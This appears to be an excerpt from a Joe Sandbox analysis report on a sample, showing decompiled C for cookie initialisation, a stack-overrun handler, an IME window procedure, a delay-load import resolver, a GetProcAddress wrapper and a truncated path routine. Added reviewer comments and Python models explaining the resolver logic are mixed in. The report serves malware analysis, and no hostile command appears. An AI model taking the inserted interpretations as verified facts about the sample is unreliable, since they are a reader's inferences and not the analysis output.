                                              				if(_t32 == 0xbb40e64e || ( *0x765040 & 0xffff0000) == 0) {
                                              					_t32 = 0xbb40e64f;
                                              				}
                                              				 *0x765040 = _t32;
                                              				 *0x765044 =  !_t32;
                                              				return _t22;
                                              			}

                                              APIs
                                              • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 007615C1
                                              • GetCurrentProcessId.KERNEL32 ref: 007615CD
                                              • GetCurrentThreadId.KERNEL32 ref: 007615D5
                                              • GetTickCount.KERNEL32 ref: 007615DD
                                              • QueryPerformanceCounter.KERNEL32(?), ref: 007615E9
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                              • String ID:
                                              • API String ID: 1445889803-0
                                              • Opcode ID: ca579246d6e2a6a21eada04aac59f39469449b335497ee252775ed346451f5cd
                                              • Instruction ID: b802ee3f369887b91fedc23935b0b5358999f531435d5ed431dc15cd892a9bb3
                                              • Opcode Fuzzy Hash: ca579246d6e2a6a21eada04aac59f39469449b335497ee252775ed346451f5cd
                                              • Instruction Fuzzy Hash: E4118E36C00314EBCB209BB8D94C6AAB7B8EB48351F9A4915E907E7210DBBC9D449B84
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 91%
                                              			E00761189(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                              				intOrPtr _v0;
                                              				void* _v804;
                                              				intOrPtr _v808;
                                              				intOrPtr _v812;
                                              				intOrPtr* _t26;
                                              
                                              				if(__ecx !=  *0x765040) {
                                              					 *0x765180 = __eax;
                                              					 *0x76517c = __ecx;
                                              					 *0x765178 = __edx;
                                              					 *0x765174 = __ebx;
                                              					 *0x765170 = __esi;
                                              					 *0x76516c = __edi;
                                              					 *0x765198 = ss;
                                              					 *0x76518c = cs;
                                              					 *0x765168 = ds;
                                              					 *0x765164 = es;
                                              					 *0x765160 = fs;
                                              					 *0x76515c = gs;
                                              					asm("pushfd");
                                              					_pop( *0x765190);
                                              					 *0x765184 =  *_t26;
                                              					 *0x765188 = _v0;
                                              					 *0x765194 =  &_a4;
                                              					 *0x7650d0 = 0x10001;
                                              					 *0x76508c =  *0x765188;
                                              					 *0x765080 = 0xc0000409;
                                              					 *0x765084 = 1;
                                              					_v812 =  *0x765040;
                                              					_v808 =  *0x765044;
                                              					SetUnhandledExceptionFilter(0);
                                              					UnhandledExceptionFilter(E00763F68);
                                              					return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                              				} else {
                                              					return __eax;
                                              				}
                                              			}

                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32 ref: 00763F40
                                              • UnhandledExceptionFilter.KERNEL32(00763F68), ref: 00763F4B
                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00763F56
                                              • TerminateProcess.KERNEL32(00000000), ref: 00763F5D
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                              • String ID:
                                              • API String ID: 3231755760-0
                                              • Opcode ID: 94d8364c3ee3a955dcbf02222f0556f52c976359cc8e5bfbdaf9dc02d4a45614
                                              • Instruction ID: 7deb5d62041f59097a92f7b44b6b5aaeae9dc4575401e98dcc92c11038244384
                                              • Opcode Fuzzy Hash: 94d8364c3ee3a955dcbf02222f0556f52c976359cc8e5bfbdaf9dc02d4a45614
                                              • Instruction Fuzzy Hash: 5B216FB4805B08EFCB58DF29E9447483BB4FB0A304F948119E50A97260E7FC9985EF59
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph (rendered graph not included): basic blocks 76119b-762312; API calls along the paths: GetWindowLongW, DefWindowProcW, GetWindow, memset, GetClassNameW, CompareStringW, GetClassLongW, SetWindowLongW, SetClassLongW; exit path calls 761189
                                              C-Code - Quality: 86%
                                              			E0076119B(void* __ebx, void* __edi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                              				signed int _v8;
                                              				void _v166;
                                              				short _v168;
                                              				struct HWND__* _v172;
                                              				long _v176;
                                              				void* __esi;
                                              				long _t25;
                                              				long _t27;
                                              				long _t38;
                                              				long _t44;
                                              				void* _t53;
                                              				struct HWND__* _t55;
                                              				signed int _t57;
                                              
                                              				_t54 = __edi;
                                              				_t47 = __ebx;
                                              				_v8 =  *0x765040 ^ _t57;
                                              				_t25 = _a16;
                                              				_t56 = _a4;
                                              				_v172 = _t56;
                                              				_v176 = _t25;
                                              				if(_a8 == 0x1c) {
                                              					_push(__ebx);
                                              					if(GetWindowLongW(_t56, 0) == 0) {
                                              						L14:
                                              						_pop(_t47);
                                              						L2:
                                              						_t27 = DefWindowProcW(_v172, _a8, _a12, _v176);
                                              						L3:
                                              						return E00761189(_t27, _t47, _v8 ^ _t57, _t53, _t54, _t56);
                                              					}
                                              					_push(__edi);
                                              					_t56 = GetWindow;
                                              					_t55 = GetWindow(GetWindow, 3);
                                              					if(_t55 == 0) {
                                              						L13:
                                              						_pop(_t54);
                                              						goto L14;
                                              					}
                                              					_v168 = 0;
                                              					memset( &_v166, 0, 0x9e);
                                              					if(GetClassNameW(_t55,  &_v168, 0x50) != 0 && CompareStringW(0x7f, 1,  &_v168, 0xffffffff, ?str?, 0xffffffff) == 2) {
                                              						_t55 = GetWindow(_t55, 3);
                                              					}
                                              					if(GetWindow(_t55, 4) == _v172) {
                                              						_t56 = GetWindowLongW(_t55, 0xffffffec);
                                              						if((_t56 & 0x00040080) == 0 && GetClassLongW(_t55, 0xffffffde) == 0) {
                                              							_t38 = GetClassLongW(_v172, 0xfffffff2);
                                              							SetWindowLongW(_t55, 0xffffffec, _t56);
                                              							SetClassLongW(_t55, 0xffffffde, _t38);
                                              						}
                                              					}
                                              					goto L13;
                                              				}
                                              				if(_a8 == 0x4e) {
                                              					if( *((intOrPtr*)(_t25 + 8)) != 0xfffffe0c) {
                                              						goto L2;
                                              					}
                                              					_t44 =  *(_t25 + 0xc);
                                              					if(_t44 != 0) {
                                              						SetClassLongW(_t56, 0xfffffff2, _t44);
                                              					}
                                              					SetWindowLongW(_t56, 0, 1);
                                              					_t27 = 0;
                                              					goto L3;
                                              				}
                                              				goto L2;
                                              			}

                                              APIs
                                              • DefWindowProcW.USER32(?,0000004E,?,?), ref: 007611E9
                                              • GetWindowLongW.USER32(?,00000000), ref: 00762202
                                              • GetWindow.USER32(?,00000003), ref: 00762216
                                              • memset.MSVCRT ref: 00762238
                                              • GetClassNameW.USER32(00000000,?,00000050), ref: 0076224A
                                              • CompareStringW.KERNEL32(0000007F,00000001,?,000000FF,IME,000000FF), ref: 00762268
                                              • GetWindow.USER32(00000000,00000003), ref: 00762276
                                              • GetWindow.USER32(00000000,00000004), ref: 0076227D
                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 0076228A
                                              • GetClassLongW.USER32 ref: 0076229F
                                              • GetClassLongW.USER32 ref: 007622AD
                                              • SetWindowLongW.USER32 ref: 007622BB
                                              • SetClassLongW.USER32(00000000,000000DE,00000000), ref: 007622C5
                                              • SetClassLongW.USER32(?,000000F2,0000004E), ref: 007622FF
                                              • SetWindowLongW.USER32 ref: 0076230A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: LongWindow$Class$CompareNameProcStringmemset
                                              • String ID: IME$N
                                              • API String ID: 1578343765-3965882335
                                              • Opcode ID: cab724d612f71942bfb793bfd3af127b2f963c785d230645fcd7bc3931df9f03
                                              • Instruction ID: a9684859b4685dcd9a950c7b754e809b94391852b5a9bbbc2c549c756122ea33
                                              • Opcode Fuzzy Hash: cab724d612f71942bfb793bfd3af127b2f963c785d230645fcd7bc3931df9f03
                                              • Instruction Fuzzy Hash: 6B411830A00318BFCF605B658C48F6A76A8BF46720F558251FA17E61D1D7788D818F65
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph (rendered graph not included): basic blocks 763b77-763c9e; API calls along the paths: LoadLibraryExA, GetLastError, InterlockedCompareExchange, FreeLibrary, GetProcAddress, DelayLoadFailureHook
                                              C-Code - Quality: 83%
                                              			/* Reviewer annotation (the decompiler output below is unchanged): a delay-load
                                              			   import resolver. _a4 is a delay-load descriptor used exactly like ImgDelayDescr:
                                              			   +4 rvaDLLName, +8 rvaHmod, +0xc rvaIAT, +0x10 rvaINT, each RVA rebased onto the
                                              			   dump's image base 0x760000. _a8 is the address of the IAT slot to fill, so
                                              			   (_a8 - IAT) / 4 indexes the INT entry: a negative entry is an import by ordinal
                                              			   (low 16 bits), otherwise +2 skips the hint word of IMAGE_IMPORT_BY_NAME.
                                              			   The shared module-handle slot is published with InterlockedCompareExchange;
                                              			   a slot value of -1 marks a DLL that failed to load permanently. _v8 == 1 means
                                              			   "write the result into the IAT slot". L00763CCE is the DelayLoadFailureHook
                                              			   call at 0x763C86 listed under APIs. */
                                              			E00763B77(struct HINSTANCE__* _a4, int* _a8) {
                                              				signed int _v8;
                                              				CHAR* _v12;
                                              				struct HINSTANCE__* _v24;
                                              				CHAR* _v36;
                                              				void _v44;
                                              				char _v48;
                                              				struct HINSTANCE__* _t34;
                                              				int _t37;
                                              				int _t41;
                                              				CHAR* _t45;
                                              				signed short _t47;
                                              				signed int _t48;
                                              				void* _t51;
                                              				struct HINSTANCE__* _t56;
                                              				LONG* _t60;
                                              				int _t61;
                                              				int _t62;
                                              
                                              				_t34 = _a4;
                                              				_v8 = _v8 & 0x00000000;
                                              				_t60 =  *((intOrPtr*)(_t34 + 8)) + 0x760000;
                                              				_t51 =  *_t60;
                                              				_t45 =  *((intOrPtr*)(_t34 + 4)) + 0x760000;
                                              				_t47 =  *( *((intOrPtr*)(_t34 + 0x10)) + 0x760000 + (_a8 -  *((intOrPtr*)(_t34 + 0xc)) - 0x760000 >> 2) * 4);
                                              				_a4 = _t51;
                                              				_t13 = _t47 + 0x760002; // 0xec0002
                                              				_t37 = _t13;
                                              				if(_t47 < 0) {
                                              					_t37 = _t47 & 0x0000ffff;
                                              				}
                                              				_v12 = _t37;
                                              				if(_t51 != 0) {
                                              					L12:
                                              					if(_a4 != 0xffffffff) {
                                              						if(_a4 == 0) {
                                              							L20:
                                              							_push(_v12);
                                              							_push(_t45);
                                              							L00763CCE();
                                              							_t61 = _t37;
                                              							L21:
                                              							if(_v8 != 0) {
                                              								 *_a8 = _t61;
                                              							}
                                              							return _t61;
                                              						}
                                              						_t37 = GetProcAddress(_a4, _v12);
                                              						_t61 = _t37;
                                              						if(_t61 != 0) {
                                              							L18:
                                              							_v8 = 1;
                                              							L19:
                                              							if(_t61 != 0) {
                                              								goto L21;
                                              							}
                                              							goto L20;
                                              						}
                                              						_t37 = GetLastError();
                                              						if(_t37 == 0x7f || _t37 == 0xb6) { // ERROR_PROC_NOT_FOUND / ERROR_INVALID_ORDINAL: the hook's result is cached in the IAT
                                              							goto L18;
                                              						} else {
                                              							goto L19;
                                              						}
                                              					}
                                              					L13:
                                              					_v8 = 1;
                                              					goto L20;
                                              				}
                                              				_t56 = LoadLibraryExA(_t45, _t51, _t51);
                                              				_a4 = _t56;
                                              				if(_t56 == 0) {
                                              					_t37 = GetLastError();
                                              					if(_t37 == 0x7e || _t37 == 0xc1) { // ERROR_MOD_NOT_FOUND / ERROR_BAD_EXE_FORMAT: mark the module slot -1 (permanent failure)
                                              						_t37 = InterlockedCompareExchange(_t60, 0xffffffff, 0);
                                              						if(_t37 == 0) {
                                              							goto L13;
                                              						}
                                              						_a4 = _t37;
                                              						goto L12;
                                              					} else {
                                              						goto L20;
                                              					}
                                              				}
                                              				_t41 = InterlockedCompareExchange(_t60, _t56, 0);
                                              				_t62 = _t41;
                                              				if(_t62 != 0) {
                                              					_t37 = FreeLibrary(_t56);
                                              					_a4 = _t62;
                                              				} else {
                                              					// first loader of this DLL: build a 0x24-byte notification record {cb, ..., hmod, dll name}
                                              					// and pass it with code 5 to the callback pointer stored at 0x763CA4 (NULL in this dump)
                                              					_t48 = 8;
                                              					memset( &_v44, _t41, _t48 << 2);
                                              					_v24 = _a4;
                                              					_t37 =  *0x763ca4; // 0x0
                                              					_v48 = 0x24;
                                              					_v36 = _t45;
                                              					if(_t37 != 0) {
                                              						_t37 =  *_t37(5,  &_v48);
                                              					}
                                              				}
                                              				goto L12;
                                              			}


                                              APIs
                                              • LoadLibraryExA.KERNEL32(00000000), ref: 00763BCB
                                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00763BDD
                                              • FreeLibrary.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 00763C14
                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00763C5B
                                              • GetLastError.KERNEL32(00000000,00000000), ref: 00763C66
                                              • DelayLoadFailureHook.KERNEL32(00000000,00000000), ref: 00763C86
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: LibraryLoad$AddressCompareDelayErrorExchangeFailureFreeHookInterlockedLastProc
                                              • String ID: $
                                              • API String ID: 3506490669-3993045852
                                              • Opcode ID: 996a189f98300f3d8d1bb2c04e30bc7a98731b8dd27e1ef912372d7592c260eb
                                              • Instruction ID: 47aafc951dffbf4d299a63dc6890ecf1453be671c2a1393c06f4f93717e79969
                                              • Opcode Fuzzy Hash: 996a189f98300f3d8d1bb2c04e30bc7a98731b8dd27e1ef912372d7592c260eb
                                              • Instruction Fuzzy Hash: 0431AF71900215EFDB259F68C848BAEBBB5AF54750F258219FC06BB2C1C778DB44CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%
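The caching rules of E00763B77 are easy to misread in the decompiled form, so here is an added model of that function's decision structure (editor's code, not code from the sample or from Joe Sandbox). The DLL names, handles, export tables, the Win32Error class and the FAILURE_STUB value are constructed stand-ins for LoadLibraryExA, GetProcAddress and DelayLoadFailureHook; the error-code constants are the real Win32 values the function compares against.

```python
"""Model of the delay-load import resolver decompiled as E00763B77.

Added example (editor's code, not code from the sample or the report): it
reproduces the function's decision structure over a constructed in-memory
"loader" so the caching rules can be exercised offline.
"""

ERROR_ACCESS_DENIED = 0x05    # example of an error the resolver does NOT cache
ERROR_MOD_NOT_FOUND = 0x7E    # LoadLibrary failures that poison the handle slot
ERROR_PROC_NOT_FOUND = 0x7F   # GetProcAddress failures whose hook result is cached
ERROR_INVALID_ORDINAL = 0xB6
ERROR_BAD_EXE_FORMAT = 0xC1
MOD_FAILED = 0xFFFFFFFF       # slot value meaning "this DLL will never load"
FAILURE_STUB = 0xDEAD0000     # what the failure hook hands back (constructed)


class Win32Error(Exception):
    def __init__(self, code):
        super().__init__(hex(code))
        self.code = code


# Constructed stand-ins for LoadLibraryExA / GetProcAddress / DelayLoadFailureHook.
FAKE_DLLS = {
    "user32.dll": {"handle": 0x77000000,
                   "exports": {"MessageBoxW": 0x77001000, 12: 0x77002000}},
    "broken.dll": {"error": ERROR_BAD_EXE_FORMAT},    # permanent load failure
    "locked.dll": {"error": ERROR_ACCESS_DENIED},     # transient load failure
}


def load_library(name):
    dll = FAKE_DLLS.get(name)
    if dll is None:
        raise Win32Error(ERROR_MOD_NOT_FOUND)
    if "error" in dll:
        raise Win32Error(dll["error"])
    return dll["handle"]


def get_proc_address(handle, proc):
    exports = next(d["exports"] for d in FAKE_DLLS.values()
                   if d.get("handle") == handle)
    if proc in exports:
        return exports[proc]
    raise Win32Error(ERROR_INVALID_ORDINAL if isinstance(proc, int)
                     else ERROR_PROC_NOT_FOUND)


def failure_hook(dll, proc):
    return FAILURE_STUB


class DelayDescriptor:
    """One ImgDelayDescr: DLL name, shared handle slot, INT and IAT."""
    def __init__(self, dll, imports):
        self.dll = dll
        self.hmod = 0                    # 0 = not loaded, MOD_FAILED, or a handle
        self.int = list(imports)         # str = import by name, int = ordinal
        self.iat = [0] * len(imports)    # 0 = still pointing at the thunk
        self.hook_calls = 0


def resolve(desc, index):
    """Resolve IAT slot `index` the way E00763B77 does; returns the address used."""
    proc = desc.int[index]
    write_back = False     # the decompiled _v8: commit the result to the IAT
    hmod = desc.hmod
    if hmod == 0:
        try:
            loaded = load_library(desc.dll)
        except Win32Error as e:
            if e.code in (ERROR_MOD_NOT_FOUND, ERROR_BAD_EXE_FORMAT):
                # InterlockedCompareExchange(slot, -1, 0): poison the slot so
                # later resolutions skip LoadLibrary and go straight to the hook
                if desc.hmod == 0:
                    desc.hmod = MOD_FAILED
                hmod = desc.hmod
            else:
                hmod = None      # other errors: call the hook, cache nothing
        else:
            # InterlockedCompareExchange(slot, loaded, 0): first writer wins;
            # a loser would FreeLibrary its own handle and use the published one
            if desc.hmod == 0:
                desc.hmod = loaded
            hmod = desc.hmod

    addr = 0
    if hmod == MOD_FAILED:
        write_back = True    # known-bad DLL: the hook's stub is cached
    elif hmod is not None:
        try:
            addr = get_proc_address(hmod, proc)
            write_back = True
        except Win32Error as e:
            # only "no such export" errors let the hook's stub be cached
            write_back = e.code in (ERROR_PROC_NOT_FOUND, ERROR_INVALID_ORDINAL)

    if addr == 0:
        desc.hook_calls += 1
        addr = failure_hook(desc.dll, proc)
    if write_back:
        desc.iat[index] = addr
    return addr


if __name__ == "__main__":
    d = DelayDescriptor("user32.dll", ["MessageBoxW", 12, "NotExported"])
    for i in range(3):
        print(hex(resolve(d, i)), [hex(a) for a in d.iat])
```

The point worth checking when triaging a dump like this one: once a DLL has failed with ERROR_MOD_NOT_FOUND or ERROR_BAD_EXE_FORMAT, or an export is missing, the stub returned by the failure hook is written into the IAT and the resolver is never consulted again for that slot, whereas a transient error (access denied in the model) leaves both the handle slot and the IAT untouched.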

                                              C-Code - Quality: 87%
                                              			/* Reviewer annotation (decompiler output unchanged): GetProcAddress by wide-character
                                              			   name. A name of the form "#<n>" is parsed with _wtoi and looked up by ordinal (the
                                              			   decompiler shows _t21 & 0xffff where the register presumably holds the _wtoi
                                              			   result). Otherwise the name is converted to ANSI (0x400 = WC_NO_BEST_FIT_CHARS)
                                              			   into a buffer with two spare bytes and looked up with a 'W' (0x57) suffix, then an
                                              			   'A' (0x41) suffix, then bare. *_a12 is set to 1 as soon as the 'W' form is missing. */
                                              			E00761C02(struct HINSTANCE__* _a4, short* _a8, intOrPtr* _a12) {
                                              				_Unknown_base(*)()* _v8;
                                              				WCHAR* _t21;
                                              				_Unknown_base(*)()* _t30;
                                              				_Unknown_base(*)()* _t32;
                                              				void* _t39;
                                              				short* _t41;
                                              				int _t44;
                                              				int _t49;
                                              				_Unknown_base(*)()** _t51;
                                              
                                              				 *_a12 = 0;
                                              				_t21 = _a8;
                                              				_v8 = 0;
                                              				if(_t21 == 0) {
                                              					L7:
                                              					return _v8;
                                              				}
                                              				if( *_t21 == 0x23) {
                                              					_t41 =  &(_t21[1]);
                                              					if( *_t41 == 0) {
                                              						goto L2;
                                              					}
                                              					__imp___wtoi(_t41);
                                              					_v8 = GetProcAddress(_a4, _t21 & 0x0000ffff);
                                              					goto L7;
                                              				}
                                              				L2:
                                              				_t49 = lstrlenW(_t21) + 1;
                                              				_t44 = _t49 + _t49;
                                              				_t5 = _t44 + 2; // 0x2
                                              				_t39 = LocalAlloc(0, _t5);
                                              				if(_t39 == 0) {
                                              					L6:
                                              					goto L7;
                                              				}
                                              				if(WideCharToMultiByte(0, 0x400, _a8, _t49, _t39, _t44, 0, 0) != 0) {
                                              					_t51 = _t39 + lstrlenA(_t39);
                                              					 *_t51 = 0x57; // append 'W' after the converted name
                                              					 *((char*)(_t51 + 1)) = 0;
                                              					_t30 = GetProcAddress(_a4, _t39);
                                              					_v8 = _t30;
                                              					if(_t30 == 0) {
                                              						 *_a12 = 1; // no 'W' export: tell the caller an ANSI fallback is in play
                                              						 *_t51 = 0x41; // retry with an 'A' suffix
                                              						_t32 = GetProcAddress(_a4, _t39);
                                              						_v8 = _t32;
                                              						if(_t32 == 0) {
                                              							 *_t51 = _t32; // _t32 == 0 here: drop the suffix and try the bare name
                                              							_v8 = GetProcAddress(_a4, _t39);
                                              						}
                                              					}
                                              				}
                                              				LocalFree(_t39);
                                              				goto L6;
                                              			}


                                              APIs
                                              • lstrlenW.KERNEL32(?,00000000,00000000,00000001,?,?,00761BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000), ref: 00761C27
                                              • LocalAlloc.KERNEL32(00000000,00000002,?,00761BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00761C38
                                              • WideCharToMultiByte.KERNEL32(00000000,00000400,?,00000001,00000000,00000000,00000000,00000000,?,00761BC8,00000000,00000000,?,00000000,00000001,?), ref: 00761C54
                                              • lstrlenA.KERNEL32(00000000,?,00761BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00761C5F
                                              • GetProcAddress.KERNEL32(?,00000000,?,00761BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00761C79
                                              • LocalFree.KERNEL32(00000000,?,00761BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00761C87
                                              • GetProcAddress.KERNEL32(?,00000000,?,00761BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00762157
                                              • GetProcAddress.KERNEL32(?,00000000,?,00761BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 0076216A
                                              • _wtoi.MSVCRT ref: 00762397
                                              • GetProcAddress.KERNEL32(?,?,00761BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 007623A5
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: AddressProc$Locallstrlen$AllocByteCharFreeMultiWide_wtoi
                                              • String ID:
                                              • API String ID: 2554484480-0
                                              • Opcode ID: 1f7fd6d5941132f9725361213825cccbdf3e5442d59a6e3ac783c7197c770dac
                                              • Instruction ID: 825c2dbbeb5a23c99c06fbac38522753ee5972c2ba897110718210353a98384b
                                              • Opcode Fuzzy Hash: 1f7fd6d5941132f9725361213825cccbdf3e5442d59a6e3ac783c7197c770dac
                                              • Instruction Fuzzy Hash: FA217AB5500389EFCB219FA4CC889AABBECEB08354B588459F946D7210D6B8D940DA70
                                              Uniqueness

                                              Uniqueness Score: -1.00%
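The search order of E00761C02 (ordinal, then W, then A, then bare name) decides which export a caller actually ends up bound to, so here is an added model of it (editor's code, not from the sample or the report). The export table is a constructed dict standing in for GetProcAddress, and the ANSI conversion approximates WideCharToMultiByte(CP_ACP, WC_NO_BEST_FIT_CHARS, ...) with cp1252 and '?' as the default character; these are assumptions of the example, not facts about the dumped module.

```python
"""Model of the export-name search order decompiled as E00761C02.

Added example (editor's code, not from the sample or the report). `exports`
is a constructed stand-in for a DLL's export table; the cp1252 conversion
approximates the WC_NO_BEST_FIT_CHARS conversion the real code performs.
"""
import re

_WTOI = re.compile(r"^\s*([+-]?\d+)")


def wtoi(text):
    """_wtoi semantics: leading whitespace, optional sign, digits; 0 if none."""
    m = _WTOI.match(text)
    return int(m.group(1)) if m else 0


def to_ansi(name):
    # WideCharToMultiByte with WC_NO_BEST_FIT_CHARS: unmappable chars become '?'
    return name.encode("cp1252", "replace").decode("cp1252")


def resolve_export(exports, name):
    """Return (address, ansi_flag) using E00761C02's search order.

    exports: {str name or int ordinal: address}; an address of 0 means
    "not found". ansi_flag mirrors *_a12: it is set once the 'W' variant
    turns out not to be exported, even if the bare name is found later.
    """
    if name.startswith("#") and len(name) > 1:
        # "#<n>": ordinal lookup, no suffix search, flag stays clear
        return exports.get(wtoi(name[1:]) & 0xFFFF, 0), False
    base = to_ansi(name)
    addr = exports.get(base + "W", 0)       # first choice: wide variant
    if addr:
        return addr, False
    ansi_flag = True                        # *_a12 = 1 before trying 'A'
    addr = exports.get(base + "A", 0)       # second: ANSI variant
    if addr == 0:
        addr = exports.get(base, 0)         # last: suffix cleared, bare name
    return addr, ansi_flag


if __name__ == "__main__":
    table = {"MessageBoxW": 0x1000, "MessageBoxA": 0x1001,
             "GetTickCount": 0x1002, "lstrlenA": 0x1003, 7: 0x1004}
    for req in ("MessageBox", "lstrlen", "GetTickCount", "#7", "Nope"):
        print(req, resolve_export(table, req))
```

Two consequences follow directly from the decompiled logic: a request for "GetTickCount" binds to the bare export but still reports the ANSI flag, and "#" on its own is not an ordinal request but a literal name that goes through the suffix search.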

                                              C-Code - Quality: 70%
                                              			/* Reviewer annotation (decompiler output unchanged; the listing is cut off in the
                                              			   report): a path-canonicalization routine with PathCch-style limits. 0x8000 is the
                                              			   maximum character count accepted, 0x104 is MAX_PATH, and bit 0 of _a16 permits
                                              			   long paths and selects the L"\\\\?\\" / L"\\\\?\\UNC\\" prefixes (without it the
                                              			   UNC prefix is L"\\\\" and the buffer is capped at MAX_PATH). HRESULTs:
                                              			   0x80070057 = E_INVALIDARG, 0x8007007a = HRESULT_FROM_WIN32(ERROR_INSUFFICIENT_BUFFER),
                                              			   0x800700ce = HRESULT_FROM_WIN32(ERROR_FILENAME_EXCED_RANGE). */
                                              			E00763168(void* __ecx, short* _a4, char _a8, wchar_t* _a12, signed int _a16) {
                                              				intOrPtr _v8;
                                              				char _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				intOrPtr _v28;
                                              				intOrPtr _t121;
                                              				intOrPtr _t124;
                                              				signed int _t125;
                                              				int _t128;
                                              				intOrPtr* _t131;
                                              				signed int _t136;
                                              				short _t138;
                                              				short _t140;
                                              				intOrPtr* _t142;
                                              				signed int _t155;
                                              				wchar_t* _t156;
                                              				wchar_t* _t157;
                                              				intOrPtr _t163;
                                              				signed int _t164;
                                              				wchar_t* _t166;
                                              				signed int _t170;
                                              				intOrPtr _t171;
                                              				signed int _t175;
                                              				intOrPtr _t182;
                                              				int _t185;
                                              				short* _t190;
                                              				wchar_t* _t192;
                                              				signed int _t195;
                                              				void* _t196;
                                              				signed int _t197;
                                              				intOrPtr _t198;
                                              				intOrPtr _t199;
                                              				signed int _t201;
                                              				long _t203;
                                              				void* _t208;
                                              				void* _t209;
                                              				long* _t211;
                                              				wchar_t* _t214;
                                              				char _t216;
                                              				void* _t218;
                                              				short* _t220;
                                              				signed int _t221;
                                              
                                              				_t190 = _a4;
                                              				_t216 = _a8;
                                              				_v20 = 0;
                                              				_t121 = E00761AE1(_t190, _t216, E00761460);
                                              				_v8 = _t121;
                                              				if(_t121 < 0) {
                                              					L113:
                                              					return _t121;
                                              				} else {
                                              					if(_t216 > 0x8000) {
                                              						return 0x80070057;
                                              					}
                                              					if(_t216 <= 0x104) {
                                              						_a16 = _a16 & 0xfffffffe;
                                              					}
                                              					_t195 = _a16 & 0x00000001;
                                              					_v16 = _t195;
                                              					if(_t195 == 0 && _t216 > 0x104) {
                                              						_t216 = 0x104;
                                              						_a8 = 0x104;
                                              					}
                                              					_v12 = _t216;
                                              					_t124 = E00762D2E(_a12,  &_v24);
                                              					_v28 = _t124;
                                              					if(_t124 == 0) {
                                              						_t214 = _a12;
                                              						_t217 = L"\\\\?\\";
                                              						_a16 = _t190;
                                              						_t125 = E00762815(_t214, L"\\\\?\\", 4);
                                              						_v24 = _t125;
                                              						if(_t125 == 0) {
                                              							_t128 = iswalpha( *_t214 & 0x0000ffff);
                                              							_pop(_t196);
                                              							if(_t128 != 0 && _t214[0] == 0x3a) {
                                              								_v24 = 1;
                                              							}
                                              						} else {
                                              							_t192 =  &(_t214[2]);
                                              							_t185 = iswalpha( *_t192 & 0x0000ffff);
                                              							_pop(_t196);
                                              							if(_t185 == 0 || _t214[2] != 0x3a) {
                                              								_v24 = _v24 & 0x00000000;
                                              							} else {
                                              								_t214 = _t192;
                                              							}
                                              							_t190 = _a4;
                                              						}
